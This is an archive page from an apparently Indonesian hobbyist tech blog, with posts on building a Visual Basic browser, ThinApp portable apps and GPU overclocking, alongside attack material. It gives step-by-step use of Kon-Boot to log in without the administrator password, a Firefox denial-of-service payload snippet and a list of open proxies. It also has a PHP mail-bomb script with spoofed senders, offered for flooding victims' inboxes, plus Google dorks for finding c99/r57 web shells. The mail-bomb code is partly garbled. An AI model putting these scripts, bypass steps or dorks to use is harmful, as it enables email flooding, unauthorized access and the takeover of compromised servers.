28
Feb
10

Membuat Web Browser Sederhana Dengan Visual Basic

Lagi iseng malam-malam, daripada keluyuran… udah bukan ABG lagi, malu sama umur :p

ya udah, sekarang kita iseng coba bikin browser aja yuk pake visual basic.

Disini saya memakai Visual Basic 2005

Langkah-langkah :

  • Buka Visual Basic dan “Start a new windows application”

  • Meng-add tools/button pada “Form” :

– Masukkan Text Box ( no.6 )

– Masukkan Web Browser ( no.7 )

– 5 buah Button ( Button1 – Button5 )

  • Pengaturan letak Button, Text Box dan Web Browser.

– ( anda dapat menyesuaikan letak button dan ukuran form sesuai keinginan anda sendiri )

  • Memulai script 😦 ( harap ikuti petunjuk seperti digambar ) 🙂

– Dobel klik pada “Form” dan ketik :

MeText = “Web Browser”


  • Script untuk button “Go” ( Button1 )

– Dobel klik pada button “Go” lalu ketik :

WebBrowser1.Navigate(TextBox1.Text)


  • Script Untuk button “Back”

– Dobel klik pada button “Back” lalu ketik :

WebBrowser1.GoBack()


  • Script Untuk button “Forward”

– Dobel klik pada button “Forward” lalu ketik :

WebBrowser1.GoForward()


  • Lakukan hal yang sama untuk button-button selanjutnya ( button “Refresh” dan “Home” )

– Button “Refresh” :

WebBrowser1.Refresh()

– Button “Home” :

WebBrowser1.GoHome()


  • Sudah hampir selesai. Sekarang coba klik “Debug”

  • Bila sudah, sekarang tinggal mem-Pubilsh browser anda.

– Klik “Build” – pilih “Publish Web Browser” – selanjutnya pilih “Next”

( lakukan seperti contoh gambar dibawah ini )

  • Selesai… anda baru saja membuat Web Browser sendiri ! sekarang silahkan anda mencoba untuk browsing dengan browser buatan anda sendiri. J

( script diatas bisa anda rubah atau tambah… silahkan gunakan imajinasi anda. Happy Coding ! )

  • Beberapa contoh modifikasi/personalized :

– Untuk merubah warna background

Pergi ke “Form1”  properties — “Appereance” — “BackColour” –> ganti warna sesuai keinginan.

– Agar “Form” dapat berubah sesuai dengan besar image

Ganti “AutoSize” menjadi “True” dan “AutoSizeMode” menjadi “GrowAndShrink”

  • Oh ya… satu lagi, anda bisa jadikan project web browser supaya dapat dijalankan di computer tanpa vb dengan cara convert menjadi file .exe

Cara membuat file Setup.exe (dapat diinstall dikomputer tanpa VB) :
–  Dari start menu masuk ke tempat biasanya
–  Pilih Microsoft Visual Studio 6.0 Tools
–  Pilih “Package & Deployment Wizard”
–  Browse Project yang diinginkan
–  Sertakan file2 yg diperlukan
–  Lakukan sesuai instruksi selanjutnya pada wizard
–  Selesai

SELAMAT MENCOBA GAN…

27
Feb
10

Buat Aplikasi Portabel Dengan ThinApp

Apa sih aplikasi portabel itu ?

Aplikasi portable adalah program yang berfungsi penuh tanpa harus menginstalnya pada PC Anda. Anda cukup menyalin file ke folder atau drive yang dipilih, dan kemudian menjalankannya. Portable program tidak menyimpan pengaturan program dan pilihan dalam Registry Windows.

Keuntungannya apa memakai aplikasi portabel ?

anda bisa membawa kemana saja aplikasi kesayangan dan juga menghemat space di harddisk. dan masih banyak lagi…

Ok, sekarang kita mau nyoba buat aplikasi portabel dengan ThinApp

Apa lagi tuh ThinApp ?

ThinApp adalah sebuah aplikasi yang dapat digunakan untuk membuat aplikasi portabel. Tapi sangat disarankan anda menjalankan prosedur pembuatan aplikasi portable ini hanya dengan aplikasi yang belum pernah terinstall  pada komputer Anda.

anda bisa mengunduh VMware ThinApp disini.

Mari kita mulai 🙂

  • Jalankan program ThinApp:  pilih “Start” — “All Programs” — “VMWare” — pilih “ThinApp Setup Capture”.
  • Bila muncul jendela “ThinApp Setup Capture”, klik “next”.

  • Sebaiknya tutup semua aplikasi yang sedang berjalan.

  • ThinApp akan segera mulai men-scan semua file yang akan dibutuhkan. tunggu dengan sabar karena ini akan memakan waktu beberapa lama. scan akan selesai secara otomatis.

  • Setelah scan selesai, minimized aplikasi ThinApp.

  • Sekarang install aplikasi yang ingin anda buat menjadi portabel ( jangan tutup ThinApp, hanya minimized ! ). dalam contoh ini kita akan mencoba membuat Tune Up Utilities menjadi aplikasi portabel.

  • Install seperti biasa. bila membutuhkan serial key jgn lupa anda masukkan agar aplikasi dapat berjalan sepenuhnya.

  • Setelah Instalasi selesai, maximized kembali ThinApp lalu klik “Next” lagi untuk menganalisis system anda sekali lagi.

Kompilasi

Analisis sistem akan menentukan mana folder dan file yang diperlukan untuk instalasi software untuk dapat menciptakan sebuah versi portabel itu.

  • Sesudah analisa selesai akan muncul jendela popup baru dengan pilihan “User-accessible entry points”. Beri tanda check pada software/aplikasi yg akan dibuat portabel, setelah itu klik “Next”.

  • Sekarang anda akan disuruh memilih dimana aplikasi akan ditaruh. Pilih USB Flash Disk.

  • Pastikan “Merged isolation mode” di check  , lalu klik “Next”.

  • Pilih opsi “Fast Compression”, lalu klik “Next” lagi.

  • Folder yang akan dibutuhkan oleh aplikasi akan ditempatkan pada direktori yang sama.

  • Bila langkah-langkah tersebut diatas telah selesai, klik “Build Now” untuk membuat folder yang berisi semua file yang dibutuhkan untuk menjalankan aplikasi portabel.

  • Sekarang pilih “Browse Project” untuk menuju ke folder yang baru saja dibuat untuk aplikasi portabel anda.

  • Cari folder “Bin”, buka folder tersebut.

  • Copy file .exe yang ada di folder “Bin” ke dalam USB Flash Disk anda.

  • Selesai ! anda baru saja membuat aplikasi portabel.

SELAMAT MENCOBA GAN…

04
Jun
09

bypassing admin log-in password dengan Kon-Boot

Q : Apa sih Kon-Boot ?

A : Kon-Boot adalah sebuah software yang memungkinkan kita merubah konten dari kernel baik Window$ ataupun Linux pada saat booting. itu membuat kita bisa log-in ke dalam system window$/linux tanpa perlu tahu password administrator yg sebenarnya atau kalo di linux anda dapat meningkatkan profile biasa menjadi “root”. ( thanks to piotrbania )

Q : Dimana saya bisa download Kon-Boot ?

A : untuk download Kon-Boot, kamu bisa dapatkan disini

Kon-Boot CD ISO

Kon-Boot Floppy Image

Q : Lalu kalo sudah download, gimana makenya ?

A :

Window$

  1. Boot komputer kamu dari CD. kalo gak tau caranya boot dari cd cari caranya di paman google.
  2. Setelah boot dari cd, kamu akan mendapatkan Kon-Boot splash screen. Tekan <Enter> atau spacebar, lalu akan terlihat beberapa program checks dan setelah itu akan keluar window$ loader seperti biasa.
  3. Saat di Window$ login, masukkan admin user name dari komputer yang ingin kamu akses atau bila admin user name sudah ada sebagai default maka kamu tinggal memasukkan passwordnya, ketik apa saja ! terserah kamu ! bahkan kamu boleh saja membiarkan kolom password kosong melompong ! setelah itu tekan <Enter>….dan abrakadabra !
  4. Silahkan menikmati.  😛

Linux :  dengan metode LIWaP / Logging In Without A Password

  1. Boot dengan Kon-boot CD atau Floppy
  2. Jika Linux sudah fully booted, masuk ke console mode
  3. Ketik ‘kon-usr’ untuk login, jika berhasil kamu akan langsung masuk ke sistem

Q : Ah, masa sih ? koq simpel banget ? emang sudah pernah di tes ?

A : sudah, kalo belum ngapain saya posting disini tanpa ada data.

Versi Window$ yg sudah di tes :

Windows Server 2008 Standard SP2 (v.275)
Windows Vista Business SP0
Windows Vista Ultimate SP1
Windows Vista Ultimate SP0
Windows Server 2003 Enterprise
Windows XP
Windows XP SP1
Windows XP SP2
Windows XP SP3
Windows 7

Linux :

Gentoo 2.6.24-gentoo-r5
Ubuntu 2.6.24.3-debug
Debian 2.6.18-6-6861
Fedora 2.6.25.9-76.fc9.i686

NB :

Segala penggunaan/peruntukkan software ini menjadi tanggung jawab masing-masing pengguna !

03
Jun
09

Bugs/Vulnerability di Firefox 3.0.5 & 3.0.8

  • DoS in firefox 3.0.5

https://bugzilla.mozilla.org/show_bug.cgi?id=456727

<BODY onload=”
document.designMode=’on’;//string
document.removeChild(document.firstChild);//object
document.queryCommandState(‘BackColor’);
“>

  • vulnerability (yg belum dipatch) di Firefox 3.0.8

bugs ini memungkinkan bagi remote attacker mengakibatkan DoS atau Denial of Servicea.

0-day exploit bisa dilihat disini:

http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oP fkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8x nmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjwsAAAA1umYfXMbeoe6wr 8IrMRRv

02
Jun
09

Proxy Lists

proxy lists….silahkan dicoba bossss, jgn malu malu

Proxy : port | Tipe | Asal

200.96.157.242:80 | anonymous | Brazil
222.66.116.109:8080 | anonymous | China
125.41.181.59:8080 | anonymous | China
210.212.219.2:8080 | anonymous | India
201.2.110.71:8080 | anonymous | Brazil
213.135.96.34:8080 | high anonymity | Russian Federation
67.69.254.253:80 | anonymous | Canada
85.131.208.3:3128 | anonymous | Germany
148.233.159.58:8080 | anonymous | Mexico
210.51.33.43:80 | transparent | China
194.160.76.5:80 | anonymous | Slovak Republic
70.238.47.146:8080 | anonymous | United States
200.165.133.73:8080 | anonymous | Brazil
202.99.29.27:80 | anonymous | China
121.58.96.10:3128 | anonymous | China
190.8.137.162:3128 | anonymous | Peru
60.190.139.10:80 | anonymous | China
83.218.161.211:8080 | anonymous | Austria
123.130.112.17:8080 | anonymous | China
219.139.34.77:8080 | anonymous | China
114.30.47.10:80 | anonymous | Australia
125.242.128.79:8080 | anonymous | South Korea
83.2.212.9:8080 | anonymous | Poland
202.153.41.211:8080 | anonymous | India
202.58.163.113:8080 | anonymous | Indonesia
114.127.246.36:8080 | anonymous | Australia
203.115.81.196:80 | anonymous | India
222.168.6.226:8080 | anonymous | China
193.37.152.206:3128 | anonymous | Germany
202.159.118.50:80 | anonymous | Indonesia
202.91.12.58:80 | anonymous | Indonesia
200.223.225.129:8080 | anonymous | Brazil
75.151.156.243:8888 | anonymous | United States
91.199.187.25:80 | anonymous | Saudi Arabia
88.79.226.139:80 | anonymous | Germany
61.255.239.201:8080 | anonymous | South Korea
67.69.254.245:80 | anonymous | Canada
78.41.19.30:8080 | anonymous | Czech Republic
89.212.236.6:8080 | anonymous | Slovenia
203.162.183.222:80 | transparent | Vietnam
222.124.195.186:3128 | anonymous | Indonesia
88.191.94.176:3128 | anonymous | France
189.36.197.4:3128 | anonymous | Brazil
216.184.116.35:3128 | anonymous | Paraguay
91.92.165.253:3128 | anonymous | Bulgaria
80.80.111.133:3128 | anonymous | Russian Federation
207.245.247.196:80 | anonymous | Canada
60.253.114.30:3128 | anonymous | Indonesia
72.20.13.100:80 | anonymous | United States
67.69.254.241:80 | anonymous | Canada
222.242.188.170:8080 | high anonymity | China
208.74.35.249:3128 | anonymous | United States
115.68.28.11:8080 | anonymous | Australia
202.98.23.116:80 | anonymous | China
67.69.254.254:80 | anonymous | Canada
61.135.179.52:80 | anonymous | China
93.97.22.106:8080 | high anonymity |
216.220.231.187:3128 | anonymous | United States
72.55.191.6:3128 | high anonymity | Canada
67.69.254.244:80 | anonymous | Canada
200.174.85.193:3128 | transparent | Brazil
213.255.225.6:80 | anonymous | Lebanon
200.161.126.167:8080 | anonymous | Brazil
211.99.188.218:80 | anonymous | China
203.152.25.67:3128 | anonymous | Thailand
67.69.254.255:80 | anonymous | Canada
89.206.6.2:3128 | anonymous | Poland
79.125.7.60:80 | high anonymity | Ireland
200.220.140.226:8080 | anonymous | Brazil
218.75.100.114:8080 | anonymous | China
203.110.240.22:80 | high anonymity | India
83.151.136.51:8080 | anonymous | Denmark
88.87.7.34:8080 | anonymous | Bulgaria
207.35.173.123:3128 | anonymous | Canada
200.65.127.161:3128 | anonymous | Mexico
193.37.152.216:3128 | anonymous | Germany
125.242.162.194:8080 | anonymous | South Korea
77.240.82.6:80 | anonymous | Saudi Arabia
123.215.198.131:80 | anonymous | South Korea
202.98.23.114:80 | anonymous | China
200.65.129.2:80 | anonymous | Mexico
67.69.254.248:80 | anonymous | Canada
83.2.83.44:8080 | anonymous | Poland
67.69.254.249:80 | anonymous | Canada
123.49.42.93:8080 | anonymous | Banglades
210.51.50.242:80 | anonymous | China
118.98.165.42:8080 | anonymous | Indonesia
148.233.159.57:80 | anonymous | Mexico
67.69.254.240:80 | anonymous | Canada
202.149.73.94:8080 | anonymous | Indonesia

( thanks to darkc0de.com )

31
May
09

Overclocking Ringan GPU NVIDIA GeForce 7000 series

Dedicated to : “the crappy” GeForce 7000m/nForce 610m atau Acer Aspire 4520, 5520 users 😛

Pernah bete sama GPU notebook kamu ?

gw pernah banget….karna gimana ya, geforce 7000m tuh payah banget apalagi kalo buat game…waahhh dodol deh walaupun untuk yg lain2nya baik2 aja tapi berhubung waktu beli notebook keadaan “kantong” blom se-stabil sekarang hehehe…jadinya gak milih yg macem2. ternyata setelah hmpir 2 taun make gw terbiasa jg dengan kekurangan maupun kelebihan acer 425o gw ini lagipula we’ve been through a lot ( norak yah ! )

jadi untuk itu gw mo bagi pengalaman buat sesama acer aspire 4250 users ato siapa aja yg notebooknya mempunyai GPU GeForce 7000m/nForce 610m atau seri 7000 lainnya …, sedikit cara overclocking ringan yg pernah gw coba.

sebelumnya, kamu perlu NVIDIA nTune untuk melakukan hal ini ( silahkan download disini atau disini )

kalo udah, mari kita mulai :

  1. buka ntune lalu kamu save current profile. defaultnya itu nvsutil, save terus tutup ntune.
  2. setelah itu pergi ke X:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\nTune\Profiles ( “X” adalah direktori dimana kamu meng-install nTune )
  3. Cari “nvsutil” tadi lalu buka pake notepad. hasilnya akan terlihat mirip2 seperti dibawah ini ( profile bisa aja agak berbeda tergantung dengan GPU notebook kamu )

[BoardConfiguration]
Version=200
CPU=60f81
MCP=1127
GPU=NVIDIA GeForce 7000M / nForce 610M

[ClockSettings]
FSBMHZ=200
AGPMHZ=2500
PCIe2MHZ=0
TRAS=10
TRCD=2
TRP=2
TRC=10
TWR=2
TRRD=2
TRWT=2
TWTR=2
TWRRD=0
TWRWR=1
TRDRD=0
TREF=0
GPUCOREMHZ=350
GPUMEMMHZ=0
GPUSHADERMHZ=0
HTMULTIPLIER=3

[VoltageSettings]
CPUVOLTAGE=-1
NFORCEVOLTAGE=-1
MEMVOLTAGE=-1
AGPVOLTAGE=-1
AUXVOLTAGE=-1
CPUFAN=-1
AUXFAN1=-1
HTCPUSPPVOL=-1
HTSPPMCPVOL=-1
NFORCEFAN=-1
AUX1FAN=-1
AUX2FAN=-1
CPUVREFVOL=-1
GPUFAN3D0=0

ini settingan standart gw sebelum diutak atik/overclock. sekarang perhatikan hasil settingan setelah overclock dibawah ini ( bagian yg dioverclock gw kasih warna dari biru ke merah )
[BoardConfiguration]
Version=200
CPU=60f81
MCP=1127
GPU=NVIDIA GeForce 7000M / nForce 610M

[ClockSettings]
FSBMHZ=200 changed to 250
AGPMHZ=2500 changed to 3000
PCIe2MHZ=0
TRAS=10
TRCD=2
TRP=2
TRC=10
TWR=2
TRRD=2
TRWT=2
TWTR=2
TWRRD=0
TWRWR=1
TRDRD=0
TREF=0
GPUCOREMHZ=350 changed to 450
GPUMEMMHZ=0 changed to 667
GPUSHADERMHZ=0
HTMULTIPLIER=3

[VoltageSettings]
CPUVOLTAGE=-1
NFORCEVOLTAGE=-1
MEMVOLTAGE=-1
AGPVOLTAGE=-1
AUXVOLTAGE=-1
CPUFAN=-1
AUXFAN1=-1
HTCPUSPPVOL=-1
HTSPPMCPVOL=-1
NFORCEFAN=-1
AUX1FAN=-1
AUX2FAN=-1
CPUVREFVOL=-1
GPUFAN3D0=0

kalo udah melakukan perubahan, exit notepad setelah sebelumnya save dan overwrite file.

setelah itu buka lagi nTune, lalu load profile nvsutil yg sudah kamu rubah tadi. selesai !

silahkan kamu cek hasilnya…., kalo di notebook gw hasilnya adalah :

  • CPU dari 1.8 GHz naik jadi 2.25 GHz
  • GPU manteng di 450 MHz

o iya, kalo kamu belom puas pada settingan gw diatas…feel free untuk edit profile nvsutil sesuai dgn kebutuhan/kenekatan kamu. hehehe…

selamat mencoba, semoga manjur dan berhasil. cheers…

NB:
satu lagi, gue melakukan ini di

– Acer Aspire 4250 – AMD® Turion™ 64 x2 TL-58

– Windows Vista Home Basic 32 …. *ssssstttttt* Ori 😛

– Driver NVIDIA 177.92 ( dengan 177.41 jg pernah dan gak ada masalah)

30
Jan
09

Mail Bomb…. (hehehe, jadul yah ?)

Pernah denger Mail Bombing ? Mail bomb adalah mengirimkan email dengan jumlah yang banyak kepada korban sehingga inbox menjadi penuh. Server – server mail canggih seperti yahoo, google, hotmail yang jelas sudah memiliki security yang cukup untuk mengantisipasi serangan ini ternyata masih belum 100% sanggup memfilter karena serangan ini masuk dalam katagori denial-of-service attack yang membuat admin network dan admin server puyeng 😉

.:: How to ::.

Copy paste source code dibawah tinggal klik tombol “Copy to Clipboard” pastekan pada notepad ato text viewer lain. Simpan file dengan ext. .php contoh “mailbomb.php” upload file ini ke server yang support PHP, jika sudah selesai di upload, ketik pada address bar browser anda “http://gantidenganpunyaanda.com/path/mailbomb.php” Enter Sob! yup seharusnya keluar seperti gambar dibawah.

++ Mail Bomb ++

:: Explaination ::

Dari : email fiktif (contoh): “presiden_SBY@indonesia.gov.id”
Kepada : Email@temankamu.com
Subject : Subject Mail , isi terserah
Jumlah : banyak email yang akan dikirim
Besar : ukuran 1 email yang terkirim ( 10000 KB = 10 MB ) penting! maksimal ukuran yang sanggup ditampung oleh rata-rata email 10mb
Isi : diisi terserah saja

.:: ini source codenya ::.

Dari 	“>
Subject 	“>
Besar email (KB)
for ($i=0;$i < $jumlah;$i++) {
$a= $i.$dari.$i;
$subject = $subj.$i;
mail( $kepada,$subject,$pesan.str_repeat(" ", 1024*$besar),"From: $a <$a>\r\n” );
} echo (”Selesai Juragan!”);
}
exit;
?>

kalo mau nyari phpshell di google silahakan coba dork dibawah

1. intitle:”c99shell” uname -html

2. intitle:”r57shell” uname -html

3. inurl:”phpinfo” uname -html

4. “uname -a”+c99shell inurl:”.php”

5. “uname -a”+r57shell inurl:”.php”

HAPPY “BOMBING” YOU LITTLE CYBER RATS…. 😛




IndonesiaUnite

Tolak RPM Konten !

Image and video hosting by TinyPic
March 2017
M T W T F S S
« Feb    
 12345
6789101112
13141516171819
20212223242526
2728293031  
Image and video hosting by TinyPic
The Ubuntu Counter Project - user number # 25985
IP

RSS Kompas Nasional RSS

  • An error has occurred; the feed is probably down. Try again later.

RSS Kompas Internasional RSS

  • An error has occurred; the feed is probably down. Try again later.

RSS Bola News RSS

  • An error has occurred; the feed is probably down. Try again later.